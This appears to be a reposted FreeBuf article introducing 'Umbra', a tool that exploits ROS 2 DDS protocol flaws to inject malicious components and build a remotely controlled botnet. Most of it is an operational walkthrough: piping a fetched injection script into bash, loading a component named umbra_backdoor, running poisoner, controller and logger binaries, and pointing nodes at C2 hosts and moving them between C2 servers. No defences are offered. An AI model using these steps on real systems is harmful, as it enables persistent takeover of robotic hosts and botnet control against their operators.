Umbra(陰影):DDS底層協議漏洞&遠程惡意組件注入Botnets
该文章描述了针对ROS 2协议的協定漏洞攻擊方法,展示了如何利用跨子網通訊限制和容器元件權限控制缺陷等漏洞,構建 DDS 僵屍網路以實現遠端控制和權限提升。攻擊工具包括投毒器、控制器和日誌器等組件,並提供了具體的操作步驟和命令示例。 2025-9-27 13:12:29 Author: www.freebuf.com(查看原文) 阅读量:122 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

地址:https://github.com/MartinxMax/Umbra

ROS 2 協定漏洞:遠端惡意元件注入工具

概述跨子網通訊限制、容器元件權限控制缺陷等安全性漏洞。報告的核心目標是:透過利用這些漏洞,構建一套可遠端控制多個 ROS 2 節點的 DDS 僵屍網路,實現對目標 ROS 2 主機的持久化控制與權限提升。

細節:Umbra_Report_XX.pdf

不依賴於 ROS 2 環境條件。

若你和目標位於同一區域網路(LAN),即可部署於你自己的主機上。

$ ./umbra_poisoner

image.png

投毒器須使用參數 --c2 <IP>:<PORT>連接到控制器。

$ ./umbra_console

image-1.png

記錄目標 LAN 中部署的 ROS 節點數量。

$ ./umbra_loger

image-2.png

  1. 將惡意元件初始化到正常的 ROS 2 系統中。

備註:在 exploit目錄中有 injection_xxxxx.sh

(Ubuntu-192.168.0.113)$ curl http://server/injection_xxxxx.sh | bash

c422d66ad998b479aefc2693f1bbbbe8.png

(Ubuntu-192.168.0.113)$ ros2 component list

image-3.png

  1. 本地註冊惡意元件(若雙方的 Ubuntu 都已安裝 ROS 2,也可遠端註冊)
(Ubuntu-192.168.0.113)$ source /dev/shm/umbra_backdoor_install/setup.bash; \
ros2 component load /UMBRA_192_168_0_113 umbra_backdoor umbra --node-name injection

image-4.png

  1. 啟動 umbra_console控制器
(Arch-192.168.0.112)$ ./umbra_console

image-5.png

  1. 啟動 umbra_loger日誌器
(Arch-192.168.0.112)$ ./umbra_loger

image-6.png

  1. 啟動 umbra_poisoner投毒器
(Arch-192.168.0.112)$ ./umbra_poisoner --c2 192.168.0.112:7010

image-7.png

  1. 在控制器中進入 session,設定節點參數並連接到 C2
Umbra# use 959145908c4f64af8292392d692b5669
Umbra[959145908c4f64af8292392d692b5669]# show
Umbra[959145908c4f64af8292392d692b5669]# set HC2F 192.168.0.112:7010
Umbra[959145908c4f64af8292392d692b5669]# set HC2S 192.168.0.112:443
Umbra[959145908c4f64af8292392d692b5669]# run

image-8.png

  1. 更新命令以將節點遷移到其他 C2 主機
Umbra[959145908c4f64af8292392d692b5669]# set HC2S xxxxx:xxxxx
Umbra[959145908c4f64af8292392d692b5669]# run

e2e78b60-2b7f-4494-a3e2-5a781ba29d77.png

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/ics-articles/450702.html
如有侵权请联系:admin#unsafe.sh